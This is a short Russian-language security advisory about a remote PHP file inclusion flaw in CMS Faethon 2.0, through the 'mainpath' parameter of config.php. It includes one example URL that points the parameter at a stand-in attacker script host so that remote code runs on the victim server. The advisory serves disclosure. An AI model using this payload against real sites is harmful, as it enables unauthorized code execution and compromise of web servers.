Программа: CMS Faethon 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mainpath" сценарием config.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опций «register_globals» и «magic_quotes_gpc».

Пример:

http://victim/admin/config.php?mainpath=http://evil_script?



Оставить мнение